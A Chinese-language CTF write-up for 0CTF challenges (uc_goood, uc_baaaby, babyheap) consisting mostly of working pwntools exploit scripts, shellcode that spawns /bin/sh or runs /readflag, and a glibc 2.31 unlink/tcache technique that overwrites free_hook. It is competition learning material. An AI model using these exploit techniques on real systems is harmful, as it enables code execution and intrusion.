context.log_level = "debug"
context.arch = "amd64"

CODE = 0xdeadbeef000
STACK = 0xbabecafe000

def admin_test():
    p.recvuntil(b"?: ")
    p.sendline(b"1")

def user_test():
    p.recvuntil(b"?: ")
    p.sendline(b"2")

def patch_data(target, size, data):
    p.recvuntil(b"?: ")
    p.sendline(b"3")
    p.sendafter(b"addr: ", p64(target))
    p.sendafter(b"size: ", p64(size))
    p.sendafter(b"data: ", data)

def exp():
    p.send(b"\x90")

    patch_data(STACK, 8, p64(CODE))
    admin_test()
    patch_data(STACK, 8, p64(CODE+0x1000))

    cmd = b"k33nlab"
    cmd += b"/readflag\x00"
    patch_data(CODE+0x1000+0x53, len(cmd), cmd)

    user_test()

    p.interactive()

if __name__ == "__main__":
    exp()

uc_goood

参照r3kapig的思路复现了一下,过程看原wp就行:https://r3kapig.com/writeup/20210706-0ctf-quals/#uc_goood 然而官方真正的预期解是一个逻辑bug(牛逼):https://gist.github.com/0xKira/e865709fc47c328ffd6fac3da9d36f44 预期解的大致思路是:通过lock使得一个basic block跨越三个页,然后中间那个页的写不会更新到tb cache里面,于是下次取tb cache执行的时候,中间那个页就还是执行原先的代码。

  1. 非预期exp:

test.py

from pwn import *
from capstone import *

CODE = 0xdeadbeef000
STACK = 0xbabecafe000
admin_offset = CODE + 0x6b - 5

md = Cs(CS_ARCH_X86, CS_MODE_64)
md.detail = True

ADMIN = b'\xb9\x10\x00\x00\x00\x48\x8d\x15\x37\x00\x00\x00\x31\xc0\xbe\x01\x00\x00\x00\xbf\x01\x00\x00\x00\x48\x83\xec\x08\xe8\x5f\x00\x00\x00\x48\x8d\x05\x2b\x00\x00\x00\x48\xa3\x33\xe2\xaf\xec\xab\x0b\x00\x00\x48\x83\xc4\x08\x48\xbf\x00\xf8\xee\xdb\xea\x0d\x00\x00\xff\x67\x08\x49\x6d\x61\x67\x69\x6e\x61\x74\x69\x6f\x6e\x20\x69\x73\x20\x00\x6b\x33\x33\x6e\x6c\x61\x62\x65\x63\x68\x6f\x20\x27\x6d\x6f\x72\x65\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x74\x68\x61\x6e\x20\x6b\x6e\x6f\x77\x6c\x65\x64\x67\x65\x2e\x27\x00\x48\x89\xf8\x48\x89\xf7\x48\x89\xd6\x48\x89\xca\x4d\x89\xc2\x4d\x89\xc8\x4c\x8b\x4c\x24\x08\x0f\x05\xc3'.ljust(0x1000, b'\xf4')
print("length of ADMIN => ", len(ADMIN))

# 0xdeadbeef067:    adc    al, byte ptr [rax]
# 0xdeadbeef069:    add    byte ptr [rax], al
# 0x2d pushfq
# !!!!!!!!!!!!!!!!!!!!!!!!!!
offset = 0x9a
# !!!!!!!!!!!!!!!!!!!!!!!!!!
rax = 0xdeadbef0000 + offset

al = ((rax&0xff) + ADMIN[offset])&0xff
print(hex(al), hex(ADMIN[offset]))

rax2 = (0xdeadbef0000 & 0xfffffffff00)+al
print(hex(rax2))

if rax2 > (0xdeadbef0000+0x32):
    if rax2 not in range(0xdeadbef0000+0x80, 0xdeadbef0000+0x9b):
        print("-----nonono-----")
        exit()

tmp = bytearray(ADMIN)
tmp[rax2-0xdeadbef0000] = (tmp[rax2-0xdeadbef0000]+al)&0xff
ADMIN = bytes(tmp)
#print(al, ADMIN[offset])


print("---------- ADMIN CODE ----------")
for i in md.disasm(ADMIN[:0x45], CODE+0x1000):
    print("0x%x:\t%s\t%s" %(i.address, i.mnemonic, i.op_str))

print()
for i in md.disasm(ADMIN[0x80:0x9a], CODE+0x1000+0x80):
    print("0x%x:\t%s\t%s" %(i.address, i.mnemonic, i.op_str))

print(hex(rax2))

exp.py

from pwn import *


#p = remote("111.186.59.29", 10088)
#context.log_level = "debug"
context.arch = "amd64"

CODE = 0xdeadbeef000
STACK = 0xbabecafe000

# uc.mem_write(CODE + 0x800, p64(CODE + 0xff0) + p64(CODE + 0x2000) + p64(CODE)) 

def admin_test():
    p.recvuntil(b"?: ")
    p.sendline(b"1")

def user_test():
    p.recvuntil(b"?: ")
    p.sendline(b"2")

def patch_data(target, size, data):
    p.recvuntil(b"?: ")
    p.sendline(b"3")
    p.sendafter(b"addr: ", p64(target))
    p.sendafter(b"size: ", p64(size))
    p.sendafter(b"data: ", data)

def exp():
    global p
    #p = process(["python3", "./uc_goood.py"])
    p = remote("111.186.59.29", 10088)
    shellcode = '''
    mov rax, 0x68732f6e6962;
    push rax;
    mov rax, 0x2f62616c6e33336b;
    push rax;
    mov r8, rsp;
    mov r9, 0xbabecafe1e6;

    sub rsp, 0x135;

    mov rax, 0xdeadbef009a;
    mov rbx, 0xdeadbeef067;
    jmp rbx;
    '''
    p.send(asm(shellcode).ljust(0x1000 - 0xd, b"\xf4"))
    user_test()

    p.interactive()



# flag{Hope_you_enjoyed_the_series}
if __name__ == "__main__":
    exp()
  1. 预期解exp:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import remote, p64

p = remote('111.186.59.29', 10088)

'''
push 0
mov rax, 0x67616c6664616572
push rax
mov rax, 0x2f62616c6e33336b
push rax
mov rsi, 0xbabecafe233
mov [rsi], rsp
'''
# These shellcode will be executed under admin context
payload = b'\x6a\x00\x48\xb8\x72\x65\x61\x64\x66\x6c\x61\x67\x50\x48\xb8\x6b\x33\x33\x6e\x6c\x61\x62\x2f\x50\x48\xbe\x33\xe2\xaf\xec\xab\x0b\x00\x00\x48\x89\x26'
payload = payload.ljust(0x1000 - 0xd, b'\xf0')

p.send(payload)
p.sendlineafter('?: ', '3')
p.sendafter('addr: ', p64(0xdeadbef1000 - 0xd))
p.sendafter('size: ', p64(0xd))
p.sendafter('data: ', b'\xf0' * 0xd)
p.sendlineafter('?: ', '2')
p.sendlineafter('(y/[n])', 'y')
p.sendlineafter('?: ', '1')
p.interactive()

Misc

uc_baaaby

这个方法打本地一次过但是打远程有几率性,不清楚为什么

题目限制主要是三点:

  1. 需要用x86汇编完成指定地址md5计算

  2. 不能有超过一个基本块(除了入口)

  3. 取指次数小于0x233次

第一个问题可以从网上找个fastmd5来魔改,编译成位置无关代码后提取出来主要部分作为shellcode 关于上面第二个问题通过展开循环和内联函数来解决 第三个问题通过构造12字节长指令add qword ptr es:[rax+rcx+0x100], 0x1000,并在前缀pad一定数量的\xF0(lock)来爆破直到最终步数小于等于0x233 fast_x8664_md5.c

/* 
 * MD5 hash in C and x86 assembly
 * 
 * Copyright (c) 2021 Project Nayuki. (MIT License)
 * https://www.nayuki.io/page/fast-md5-hash-implementation-in-x86-assembly
 * 
 * Permission is hereby granted, free of charge, to any person obtaining a copy of
 * this software and associated documentation files (the "Software"), to deal in
 * the Software without restriction, including without limitation the rights to
 * use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
 * the Software, and to permit persons to whom the Software is furnished to do so,
 * subject to the following conditions:
 * - The above copyright notice and this permission notice shall be included in
 *   all copies or substantial portions of the Software.
 * - The Software is provided "as is", without warranty of any kind, express or
 *   implied, including but not limited to the warranties of merchantability,
 *   fitness for a particular purpose and noninfringement. In no event shall the
 *   authors or copyright holders be liable for any claim, damages or other
 *   liability, whether in an action of contract, tort or otherwise, arising from,
 *   out of or in connection with the Software or the use or other dealings in the
 *   Software.
 */

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include<unistd.h>
#include<sys/mman.h>

#define CODE 0xdeadbeef000LL
#define DATA 0xbabecafe000LL

/* Function prototypes */

#define BLOCK_LEN 64  // In bytes
#define STATE_LEN 4  // In words

static bool self_check(void);
void md5_hash(const uint8_t message[], size_t len, uint32_t hash[static STATE_LEN]);

// Link this program with an external C or x86 compression function
// extern inline void md5_compress(uint32_t state[static STATE_LEN], const uint8_t block[static BLOCK_LEN]);
__inline__ __attribute__((always_inline)) void md5_compress(uint32_t state[static 4], const uint8_t block[static 64]);
//void md5_compress(uint32_t state[static 4], const uint8_t block[static 64]);

/* Main program */

int main(void) {
    //char *code = mmap(CODE, 0x3000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
    //char *data = mmap(DATA, 0x3000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
    //((uint8_t *)(0xdeadbeef000LL))[0] = 1;

    uint8_t *message = (uint8_t *)DATA;
    uint32_t *hash = (uint8_t *)DATA+0x800LL;

    //memset(message, 0, 0x800);
    //memset(hash, 0, 0x10);

    //for(int i = 0 ; i < 50;i++){
    //    message[i] = 'A';
    //}

    //int len = 50;

    hash[0] = UINT32_C(0x67452301);
    hash[1] = UINT32_C(0xEFCDAB89);
    hash[2] = UINT32_C(0x98BADCFE);
    hash[3] = UINT32_C(0x10325476);

    #define LENGTH_SIZE 8  // In bytes

    /*
    size_t off;
    for (off = 0; len - off >= BLOCK_LEN; off += BLOCK_LEN)
        md5_compress(hash, &message[off]);
    */

    //uint8_t block[BLOCK_LEN] = {0};
    //size_t rem = len - off;
    //size_t rem = len;

    //memcpy(block, &message[0], 50);
    message[50] = 0x80;
    //rem++;

    message[56] = (uint8_t)(0x90U);
    /*
    for (int i = 1; i < LENGTH_SIZE; i++, len >>= 8)
        block[BLOCK_LEN - LENGTH_SIZE + i] = (uint8_t)(len & 0xFFU);
    */
    message[57] = (uint8_t)(1U);
    /*
    len >>= 8;
    block[BLOCK_LEN - LENGTH_SIZE + 2] = (uint8_t)(len & 0xFFU);
    len >>= 8;
    block[BLOCK_LEN - LENGTH_SIZE + 3] = (uint8_t)(len & 0xFFU);
    len >>= 8;
    block[BLOCK_LEN - LENGTH_SIZE + 4] = (uint8_t)(len & 0xFFU);
    len >>= 8;
    block[BLOCK_LEN - LENGTH_SIZE + 5] = (uint8_t)(len & 0xFFU);
    len >>= 8;
    block[BLOCK_LEN - LENGTH_SIZE + 6] = (uint8_t)(len & 0xFFU);
    len >>= 8;
    block[BLOCK_LEN - LENGTH_SIZE + 7] = (uint8_t)(len & 0xFFU);
    */


    md5_compress(hash, message);

    //for(int i = 0 ; i < 16;i++){
    //    printf("%x " , ((uint8_t *)hash)[i]);
    //}

    return 0;
}

void md5_compress(uint32_t state[static 4], const uint8_t block[static 64]) {
    #define LOADSCHEDULE(i)  \
        schedule[i] = (uint32_t)block[i * 4 + 0] <<  0  \
                    | (uint32_t)block[i * 4 + 1] <<  8  \
                    | (uint32_t)block[i * 4 + 2] << 16  \
                    | (uint32_t)block[i * 4 + 3] << 24;

    uint32_t schedule[16];
    LOADSCHEDULE( 0)
    LOADSCHEDULE( 1)
    LOADSCHEDULE( 2)
    LOADSCHEDULE( 3)
    LOADSCHEDULE( 4)
    LOADSCHEDULE( 5)
    LOADSCHEDULE( 6)
    LOADSCHEDULE( 7)
    LOADSCHEDULE( 8)
    LOADSCHEDULE( 9)
    LOADSCHEDULE(10)
    LOADSCHEDULE(11)
    LOADSCHEDULE(12)
    LOADSCHEDULE(13)
    LOADSCHEDULE(14)
    LOADSCHEDULE(15)

    #define ROTL32(x, n)  (((0U + (x)) << (n)) | ((x) >> (32 - (n))))  // Assumes that x is uint32_t and 0 < n < 32
    #define ROUND0(a, b, c, d, k, s, t)  ROUND_TAIL(a, b, d ^ (b & (c ^ d)), k, s, t)
    #define ROUND1(a, b, c, d, k, s, t)  ROUND_TAIL(a, b, c ^ (d & (b ^ c)), k, s, t)
    #define ROUND2(a, b, c, d, k, s, t)  ROUND_TAIL(a, b, b ^ c ^ d        , k, s, t)
    #define ROUND3(a, b, c, d, k, s, t)  ROUND_TAIL(a, b, c ^ (b | ~d)     , k, s, t)
    #define ROUND_TAIL(a, b, expr, k, s, t)    \
        a = 0U + a + (expr) + UINT32_C(t) + schedule[k];  \
        a = 0U + b + ROTL32(a, s);

    uint32_t a = state[0];
    uint32_t b = state[1];
    uint32_t c = state[2];
    uint32_t d = state[3];

    ROUND0(a, b, c, d,  0,  7, 0xD76AA478)
    ROUND0(d, a, b, c,  1, 12, 0xE8C7B756)
    ROUND0(c, d, a, b,  2, 17, 0x242070DB)
    ROUND0(b, c, d, a,  3, 22, 0xC1BDCEEE)
    ROUND0(a, b, c, d,  4,  7, 0xF57C0FAF)
    ROUND0(d, a, b, c,  5, 12, 0x4787C62A)
    ROUND0(c, d, a, b,  6, 17, 0xA8304613)
    ROUND0(b, c, d, a,  7, 22, 0xFD469501)
    ROUND0(a, b, c, d,  8,  7, 0x698098D8)
    ROUND0(d, a, b, c,  9, 12, 0x8B44F7AF)
    ROUND0(c, d, a, b, 10, 17, 0xFFFF5BB1)
    ROUND0(b, c, d, a, 11, 22, 0x895CD7BE)
    ROUND0(a, b, c, d, 12,  7, 0x6B901122)
    ROUND0(d, a, b, c, 13, 12, 0xFD987193)
    ROUND0(c, d, a, b, 14, 17, 0xA679438E)
    ROUND0(b, c, d, a, 15, 22, 0x49B40821)
    ROUND1(a, b, c, d,  1,  5, 0xF61E2562)
    ROUND1(d, a, b, c,  6,  9, 0xC040B340)
    ROUND1(c, d, a, b, 11, 14, 0x265E5A51)
    ROUND1(b, c, d, a,  0, 20, 0xE9B6C7AA)
    ROUND1(a, b, c, d,  5,  5, 0xD62F105D)
    ROUND1(d, a, b, c, 10,  9, 0x02441453)
    ROUND1(c, d, a, b, 15, 14, 0xD8A1E681)
    ROUND1(b, c, d, a,  4, 20, 0xE7D3FBC8)
    ROUND1(a, b, c, d,  9,  5, 0x21E1CDE6)
    ROUND1(d, a, b, c, 14,  9, 0xC33707D6)
    ROUND1(c, d, a, b,  3, 14, 0xF4D50D87)
    ROUND1(b, c, d, a,  8, 20, 0x455A14ED)
    ROUND1(a, b, c, d, 13,  5, 0xA9E3E905)
    ROUND1(d, a, b, c,  2,  9, 0xFCEFA3F8)
    ROUND1(c, d, a, b,  7, 14, 0x676F02D9)
    ROUND1(b, c, d, a, 12, 20, 0x8D2A4C8A)
    ROUND2(a, b, c, d,  5,  4, 0xFFFA3942)
    ROUND2(d, a, b, c,  8, 11, 0x8771F681)
    ROUND2(c, d, a, b, 11, 16, 0x6D9D6122)
    ROUND2(b, c, d, a, 14, 23, 0xFDE5380C)
    ROUND2(a, b, c, d,  1,  4, 0xA4BEEA44)
    ROUND2(d, a, b, c,  4, 11, 0x4BDECFA9)
    ROUND2(c, d, a, b,  7, 16, 0xF6BB4B60)
    ROUND2(b, c, d, a, 10, 23, 0xBEBFBC70)
    ROUND2(a, b, c, d, 13,  4, 0x289B7EC6)
    ROUND2(d, a, b, c,  0, 11, 0xEAA127FA)
    ROUND2(c, d, a, b,  3, 16, 0xD4EF3085)
    ROUND2(b, c, d, a,  6, 23, 0x04881D05)
    ROUND2(a, b, c, d,  9,  4, 0xD9D4D039)
    ROUND2(d, a, b, c, 12, 11, 0xE6DB99E5)
    ROUND2(c, d, a, b, 15, 16, 0x1FA27CF8)
    ROUND2(b, c, d, a,  2, 23, 0xC4AC5665)
    ROUND3(a, b, c, d,  0,  6, 0xF4292244)
    ROUND3(d, a, b, c,  7, 10, 0x432AFF97)
    ROUND3(c, d, a, b, 14, 15, 0xAB9423A7)
    ROUND3(b, c, d, a,  5, 21, 0xFC93A039)
    ROUND3(a, b, c, d, 12,  6, 0x655B59C3)
    ROUND3(d, a, b, c,  3, 10, 0x8F0CCC92)
    ROUND3(c, d, a, b, 10, 15, 0xFFEFF47D)
    ROUND3(b, c, d, a,  1, 21, 0x85845DD1)
    ROUND3(a, b, c, d,  8,  6, 0x6FA87E4F)
    ROUND3(d, a, b, c, 15, 10, 0xFE2CE6E0)
    ROUND3(c, d, a, b,  6, 15, 0xA3014314)
    ROUND3(b, c, d, a, 13, 21, 0x4E0811A1)
    ROUND3(a, b, c, d,  4,  6, 0xF7537E82)
    ROUND3(d, a, b, c, 11, 10, 0xBD3AF235)
    ROUND3(c, d, a, b,  2, 15, 0x2AD7D2BB)
    ROUND3(b, c, d, a,  9, 21, 0xEB86D391)

    state[0] = 0U + state[0] + a;
    state[1] = 0U + state[1] + b;
    state[2] = 0U + state[2] + c;
    state[3] = 0U + state[3] + d;
}
exploit.py
from pwn import *
import time

elf = ELF("./vuln")
#context.log_level = "debug"
context.arch = "amd64"

CODE = 0xdeadbeef000
DATA = 0xbabecafe000

def exp():
    global p
    for i in range(1, 0x2000):
        print("---------------------------curr", i)
        p = remote("111.186.59.29", 10086)
        #p = process(["python3","./uc_baaaby.py"])

        code = b""
        with open("./vuln2", "rb") as f:
            data = f.read()
            code = data[0x1044:0x16d0]
        print("Main code size:", hex(0x16d0-0x1044))
        payload = asm('''
            mov rbp, 0xbabecafefff;
            mov rsp, rbp;
        ''')
        print("Padding Size:", hex(len(payload)))
        payload += code
        payload += asm("mov rax, 0xbabecafe000;mov rcx, 0;")
        padding_num = 1609
        payload += (b"\xF0"*padding_num+b"\x26\x48\x81\x84\x08\x00\x01\x00\x00\x10\x00\x00")*((0x2000-len(payload))//(12+padding_num))
        payload = payload.ljust(0x2000, asm("nop"))


        p.send(payload)
        print("Payload size:", hex(len(payload)))
        #p.interactive()
        try:
            p.recvuntil(b"You took ")
            _time = int(p.recvuntil(b" ", drop=True).decode())
        except:
            p.close()
            continue
        print("Time used: ", hex(_time))
        if _time<=0x233:
            pause()
        p.close()
        time.sleep(0.2)

if __name__ == "__main__":
    exp()
[1]: https://eqqie.cn/usr/uploads/2021/12/724434718.png

原writeup把思路写得非常详细,这里不赘述了,提取一些巧妙的攻击思路分析和学习就行
https://hxp.io/blog/77/0CTF-Finals-2020-babyheap/

前置

原题当时看了一下不太有思路,没有继续写下去。这题用了比较新的Glibc2.31,所以很多机制不太一样,利用手段需要改进,所以题面才会说“要更新你的技巧了”(好real的pwn,我喜欢,虽然我不会...)

unlink手段变化

原先(以Glibc2.27举例)利用unlink只需要满足如下三个条件:

  • chunksize(P) != prev_size (next_chunk(P)) [注意这条]
  • FD->bk != P || BK->fd != P
  • P->fd_nextsize->bk_nextsize != P || P->bk_nextsize->fd_nextsize != P

所以,伪造的free_chunk的nextsize并不需要和被free的chunk的prevsize一样,这就导致了利用较为简单。但是Glibc2.31在向前合并过程中,unlink之前,添加了如下检测条件:

    /* consolidate backward */
    if (!prev_inuse(p)) {
      prevsize = prev_size (p);
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      if (__glibc_unlikely (chunksize(p) != prevsize))
        malloc_printerr ("corrupted size vs. prev_size while consolidating");
      unlink_chunk (av, p);
    }

所以如果上述nextsizeprevsize不同就会触发报错。这题的关键在于巧妙地构造“正常”的unlink过程,也就是在被free的chunk和被合并的chunk之间不夹带其它的chunk构成overlapping。但是因为chunk_info结构体在一段随机内存段上,不方便直接构造fd和bk,那么fd和bk就只能从被free后放入unsorted_bin产生的指针构造。but如果free即将被合并的chunk以产生fd, bk又和我们的目标——构造overlapping 背道而驰...

然后就引出了原writeup作者的方法

巧妙构造overlapping

既然fd和bk不能直接通过free产生,那可以尝试使用一些“遗留”在堆内存上的指针——即换个思路,不直接伪造fd和bk,而是尝试伪造chunk头部的位置。

文章给出了一种利用“遗留”指针构造fake chunk的手法:

  1. 第一步

    • 分配两个同样大小的堆块,size要大于smallbin范围以保证free后能直接进入unsortedbin


    ............... - chunk A
    |             |
    |             |
    |             |
    ............... - chunk B
    |             |
    |             |
    |             |
    ...............
    
  2. 第二步

    • 释放他们使得两个堆块合并
    • 此时位于高地址的堆块指针“遗留”在了堆内存上


    ...............
    |  (header )  |
    |  (new ptr)  |
    |             |
    |             |
    |             |
    |  (old ptr)  |
    |             |
    |             |
    ...............
    
  3. 第三步

    • 对已经合并的堆块重分配,大小要把old ptr包括在内,以便于伪造堆头


    ...............
    |  (header )  |
    |  (new ptr)  |
    |             |
    |             |
    |             |
    |  (old ptr)  |
    ...............
    |  (header )  |
    |             |
    ...............
    
  4. 第四步

    • 伪造堆头


    ...............
    |  (header )  |
    |  (new ptr)  |
    |             |
    |             |
    ...............
    |  (fake H )  |
    |  (old ptr)  |
    ...............
    |  (header )  |
    |             |
    ...............
    
  5. 第五步

    • 伪造更高地址位置的prev_size和prev_inuse位,这里比较简单,可以通过夹一个小堆块然后溢出构造实现


    ...............
    |  (header )  |
    |  (new ptr)  |
    |             |
    |             |
    ...............
    |  (fake H )  |
    |  (old ptr)  |
    ..................
    |  (header )  |  |
    |             |  |  fake chunk范围
    ...............  |
    |  (help   )  |  |  <-溢出这个堆块构造下面的堆块(offbynull)
    ..................
    |  (header )  |     <-伪造prev_size和prev_inuse位
    |             |
    |             |
    ...............
    
  6. 第六步

    • free掉最高的块触发unlink
    • 此时一部分可控区域就被包含在了新堆块里面


    ...............
    |  (header )  |
    |  (new ptr)  |
    |             |
    |             |
    ...............
    |  (header )  |
    |  (old ptr)  |
    |             |
    |             |
    |             |
    |             |
    |  (help   )  |
    ................
    |  (header )  |
    |             |
    |             |
    ...............
    
  7. 第七步

    • 尽情利用这个成果,通过uaf的方式,既可以泄露libc地址,又可以构造tcache attach去修改某地址上的值...

exp

python3

from pwn import *

p = process("./babyheap")
libc = ELF("./libc.so.6")
context.log_level = "debug"


def add(size:int):
    p.recvuntil(b"Command: ")
    p.sendline(b"1")
    p.recvuntil(b"Size: ")
    p.sendline(str(size).encode())

def update(idx:int, size:int, content):
    p.recvuntil(b"Command: ")
    p.sendline(b"2")
    p.recvuntil(b"Index: ")
    p.sendline(str(idx).encode())
    p.recvuntil(b"Size: ")
    p.sendline(str(size).encode())
    p.recvuntil(b"Content: ")
    p.send(content)

def delete(idx:int):
    p.recvuntil(b"Command: ")
    p.sendline(b"3")
    p.recvuntil(b"Index: ")
    p.sendline(str(idx).encode())


def view(idx:int):
    p.recvuntil(b"Command: ")
    p.sendline(b"4")
    p.recvuntil(b"Index: ")
    p.sendline(str(idx).encode())

def go_exit():
    p.recvuntil(b"Command: ")
    p.sendline(b"5")

def exp():
    #overlapping
    add(0x508)  #0 fd
    add(0x48)   #1 
    add(0x508)  #2 extend
    add(0x508)  #3 setup
    add(0x18)   #4 
    add(0x508)  #5 bk help
    add(0x508)  #6 bk
    add(0x18)   #7
    #gdb.attach(p)

    delete(0) #del0
    delete(3) #del3
    delete(6) #del6
    delete(2) #del2
    #gdb.attach(p)

    add(0x508) #0
    add(0x508) #2
    add(0x530) #3 fake chunk
    #gdb.attach(p)

    delete(2) #del2
    delete(5) #del5
    #gdb.attach(p)

    add(0x4d8) #2
    add(0x530) #5
    add(0x4d8) #6
    #gdb.attach(p)

    delete(0) #del0
    delete(2) #del2
    #gdb.attach(p)

    add(0x508) #0
    add(0x4d8) #2
    #gdb.attach(p)

    #build fake chunk
    payload = b" "*0x508 + int(0x531).to_bytes(7, 'little')
    update(3, len(payload), payload)
    payload = b" "*8
    update(0, len(payload), payload)

    # prepare fake header and correct pointer
    payload = b" "*0x4f8 + p64(0x521) + p64(0) + p64(0x511)
    update(5, len(payload), payload)
    #gdb.attach(p)

    payload = b" "*0x10 + p64(0x530)
    update(4, len(payload), payload)
    #gdb.attach(p)
    # merge fakechunk to overlapping
    delete(5) #fd: 0x0000555555559490   bk: 0x000055555555a940
    #gdb.attach(p)

    #get the part near idx3
    #make a glibc_addr into idx2
    add(0x28)
    #leak
    view(2)
    p.recvuntil(b"Chunk[2]: ")
    libc_leak = u64(p.recvuntil(b"\n", drop=True).ljust(8, b"\x00"))
    libc_base = libc_leak - 0x1ebbe0
    system = libc_base + libc.symbols[b"system"]
    free_hook = libc_base + 0x1eeb28
    print("libc_leak:", hex(libc_leak))
    print("libc_base:", hex(libc_base))
    print("system:", hex(system))
    print("free_hook:", hex(free_hook))

    #tcache attack to rewrite free_hook
    add(0x28) #8
    add(0x28) #9
    delete(9) #del8
    delete(8) #del9

    payload = p64(free_hook)
    update(2, len(payload), payload)
    #gdb.attach(p)
    add(0x28) #8
    add(0x28) #9

    update(9, 8, p64(system))
    gdb.attach(p)

    #free idx8 to call system("/bin/sh\x00")
    payload = b"/bin/sh\x00"
    update(8, len(payload), payload)
    delete(8)

    p.interactive()

if __name__ == "__main__":
    exp()